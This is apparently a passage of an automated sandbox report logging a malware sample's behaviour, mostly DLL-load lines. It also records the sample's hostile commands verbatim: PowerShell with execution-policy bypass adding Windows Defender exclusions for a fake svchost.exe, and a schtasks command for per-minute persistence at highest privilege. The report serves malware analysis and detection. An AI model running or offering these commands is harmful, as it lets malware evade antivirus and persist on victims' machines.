                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe'Jump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'Jump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe'Jump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'Jump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Roaming\svchost.exe"Jump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: sxs.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: scrrun.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: linkinfo.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: ntshrui.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: cscapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: avicap32.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: msvfw32.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: mscoree.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: version.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: ucrtbase_clr0400.dll
